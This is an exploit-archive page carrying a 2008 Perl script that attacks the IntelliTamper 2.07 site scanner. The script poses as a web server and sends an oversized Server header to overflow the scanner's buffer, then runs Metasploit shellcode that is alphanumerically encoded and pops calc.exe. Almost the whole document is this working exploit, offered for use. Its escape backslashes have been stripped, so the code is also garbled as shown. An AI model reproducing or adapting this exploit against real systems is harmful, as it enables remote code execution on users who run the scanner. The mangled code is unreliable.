IntelliTamper 2.07 (server header) Remote Code Execution Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : IntelliTamper 2.07 (server header) Remote Code Execution Exploit
# Published : 2008-07-22
# Author : Koshi
# Previous Title : IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit
# Next Title : Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)

#!/usr/bin/perl
#
# IntelliTamper 2.07 Remote Code Execution ( server header )
#
# By: Koshi
#
# Guido Landi finally did it, thought i'd throw one in there.
# This example assumes you're scanning "http://127.0.0.1"
# For example, exploit may not work if you were to scan "http://127.0.0.1:80"
# or even changing it as slightly as "http://127.0.0.1/"
#
# gr33tz: Rima my baby, str0ke, messiah, Idol, old venny  ;) , BU,
# and finally, Guido Landi for sparking my interest in exploiting
# this application.
#
#

use IO::Socket;

my $msg="";
my $overflow = "A"x1536;
my $fun = "".
	"xb3x8dx95x7c". 						# EIP (0x7C958DB3      call esp NTDLL.DLL)
	"z3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0C".	# More buffer.
	"AAAA2Cb3Cb4CBBBB"; 						# Starts executing here


# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
my $sh3llcode =
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49".
"x49x49x49x49x49x49x49x49x49x37x49x49x51x5ax6ax63".
"x58x30x42x31x50x42x41x6bx41x41x73x41x32x41x41x32".
"x42x41x30x42x41x58x38x41x42x50x75x4bx59x59x6cx6a".
"x48x70x44x35x50x65x50x73x30x6ex6bx33x75x75x6cx4c".
"x4bx71x6cx53x35x74x38x55x51x78x6fx6ex6bx62x6fx36".
"x78x6cx4bx53x6fx65x70x36x61x6ax4bx43x79x6ex6bx76".
"x54x4ex6bx53x31x68x6ex64x71x6fx30x5ax39x4ex4cx6e".
"x64x6fx30x71x64x75x57x78x41x38x4ax74x4dx76x61x4f".
"x32x5ax4bx39x64x75x6bx43x64x67x54x74x44x74x35x48".
"x65x6cx4bx73x6fx37x54x57x71x38x6bx70x66x6ex6bx64".
"x4cx70x4bx4ex6bx33x6fx35x4cx64x41x38x6bx4cx4bx37".
"x6cx4cx4bx76x61x58x6bx6cx49x43x6cx55x74x56x64x4f".
"x33x44x71x4fx30x30x64x6cx4bx77x30x74x70x6fx75x49".
"x50x50x78x36x6cx4cx4bx33x70x54x4cx6ex6bx30x70x45".
"x4cx6ex4dx4cx4bx55x38x43x38x78x6bx44x49x6ex6bx4b".
"x30x6cx70x45x50x65x50x75x50x4cx4bx41x78x75x6cx51".
"x4fx30x31x7ax56x51x70x30x56x4fx79x38x78x6cx43x6b".
"x70x71x6bx72x70x61x78x4ax50x4dx5ax43x34x43x6fx43".
"x58x4cx58x49x6ex6cx4ax66x6ex43x67x69x6fx48x67x43".
"x53x73x51x50x6cx41x73x66x4ex70x65x72x58x71x75x37".
"x70x63";

my $overflow2 = "A"x1046;
my $buff = "$overflow$fun$sh3llcode";
my $resp = "".
	"HTTP/1.1 200 OKrn".
	"Connection: closern".
	"Content-Length: 8rn".
	"Date: Mon, 21 Jul 2008 20:47:05 GMTrn".
	"Content-Type: text/plainrn".
	"Server: $buffrn".
	"MIME-Version: 1.0rnrn".
	"Exploit!rn";

my $sock = new IO::Socket::INET (LocalPort => '80', Proto => 'tcp', Listen => 1, Reuse => 1, );


print "Listening on port 80 for connections...n";
my $new_sock = $sock->accept();
print "Got connection from client...n";
my $sock_addr = recv($new_sock,$msg,190,0);
print "Sending client packet...n";
print $new_sock "$resp";
print "Packet sent to client, voila?n";
close($sock);
print "Socket closedn";

# www.Syue.com [2008-07-22]